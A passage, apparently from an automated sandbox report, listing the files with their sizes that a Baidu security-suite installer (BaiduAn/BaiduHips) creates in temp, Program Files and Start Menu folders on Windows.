    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
    %WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDDefense.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\systemfile.dat (6 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMNetMon.sys (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vatl.msi (6584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerConfig.dat (900 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBugRpt.exe (3361 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Softmgr.rdb (690 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SmartTips.rdb (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy_baiduan.xml (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsUpdate.exe (36 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\StartupDict.dat (19096 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\policy.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\8500.dat (18424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMReport.dll (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense_x64.sys (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerTrayPlugin.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\directui license.txt (593 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMProcessRunningTime.dll (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr.ico (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAFileHelper.exe (21216 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVEng.dll (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDLogicUtils.dll (10136 bytes)
    %Documents and Settings%\All Users\Desktop\百度卫士.lnk (895 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDNetMisc.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\softmgr_remind.ico (12024 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\InstallCfg.xml (177 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\placeholder_tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVScanPlugin.dll (12088 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\百度卫士\百度卫士.lnk (907 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageCleanerConfig.dat (12 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_self_enc.xml (1 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMUpdate.rdb (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDConfig.dll (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libeay32.dll (33391 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hipsClient.xml (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSvc.exe (33295 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HipsClient.dll (16424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurllicense.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\uninst.exe (51840 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDKitUtils.dll (7384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0001.sys (11144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\DriverManager.dll (8680 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\wverify.dat (15019 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\font_desc.f (873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccStrategyMgr.dll (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsBusiness.dll (9320 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SOManager.rdb (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SORegCleanerScript.dat (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt.dll (15168 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Mainpage.rdb (23936 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch.7z (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMsg.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMStringUtils.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDAVCache.dll (34186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonMgrDll.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepBase.dll (30344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\TrustAndIso.dll (14416 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWParseDetect.dll (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSupplyId.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.sys (19752 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMWindowsLib.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginSetup.xml (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bdmantivirus\BDKitUtils.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysOptDict.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMLog.dll (1552 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SusPlugin.rdb (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerConfig.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\InstallHelper.dll (37368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_repairproperty.dat (2 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\dl.dll (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMNet.dll (33295 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\preliminary.db (23296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSCleaner.dll (32824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSoftMgrModule.dll (1552 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\百度卫士\卸载百度卫士.lnk (880 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\CommonRes.rdb (62035 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\duilib license.txt (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSafePlugin.dll (21216 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GameNoDisturb.ini (215 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\804.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccServicePlugin.dll (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDSWShellExt64.dll (20624 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMToolBox.dll (18424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixer.dll (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWAcc.exe (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsIU.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerXMLScript.dat (3 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDDefense.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCommon.dll (10136 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMAVCached.dll (1425 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray.rdb (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVEng.dll (50840 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_class_filter.db (26688 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\kav_compatible.dat (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMReport.dll (25672 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_property.dat (10136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCScriptBind.dll (32824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDbSqlite.dll (19592 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\cache_config.dat (469 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\EnhanceBoost.dll (10136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ad.dll (38248 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Patcher.rdb (2392 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDDefense_x64.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccTrayPlugin.dll (14184 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\BDArKit.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_extlist.dat (3 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMReport.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\color_desc.clr (213 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\policy.xml (2 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduPrevUIn.dll (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOHomePageCleanerConfig.dat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcherPlugin.dll (39770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\pluginUnit.dat (727 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SYSAccMgrDll.dll (21216 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWHelper.dll (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHipsCore.dll (30344 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SafePlugin.rdb (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerPreOptimizeXMLScript.dat (519 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHips.exe (64 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\ns19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNetComm.dll (12088 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMScriptVM.dll (8184 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\blacksign.dat (1389 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMFrameWork.dll (21480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSusPlugin.dll (10136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\ccesign.dat (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTrayTipsPlugin.dll (23424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMMainFrame.dll (34773 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOPluginCleanerConfig.dat (441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\install_res.rdb (40702 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMConnect.dll (28288 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysAccelerator.rdb (6584 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0002.sys (673 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\bd0001.sys (601 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0001.sys (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\openssllicense.txt (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bddownloader.exe (41699 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWManagerView.dll (37727 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAccount.dll (14184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bduf.dll (15168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSkin.dll (33263 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_minute_speed.png (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccDataMgr.dll (11048 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVMain.rdb (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\placeholder_tmp (11 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMTinyXml.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduPrevUIn.dll (13584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysRepLib.dat (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnSWPlugin.exe (784 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMFrameWork.dll (1425 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\bd0002.sys (673 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\TrustAndIso.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\app.ico (12024 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMTinyXml.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BDMFrameWork.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\cache_config.dat (469 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_product.xml (291 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOCleanerPlugin.dll (88648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerCheckItem.dat (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMNet.dll (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDALeakfixer.exe (27704 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SysFixer.rdb (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMUpdate.dll (14840 bytes)
    %Program Files%\baidu\BaiduAn\3.0.0.3971\drivers\BDMWrench.sys (7192 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (1068 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NetService.ini (1205 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDPerflog.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SWCatalogDataItem.xml (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMDownload.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\HotPlugins.xml (386 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMLog.dll (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMCloudEng.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSmartTip.dll (12024 bytes)
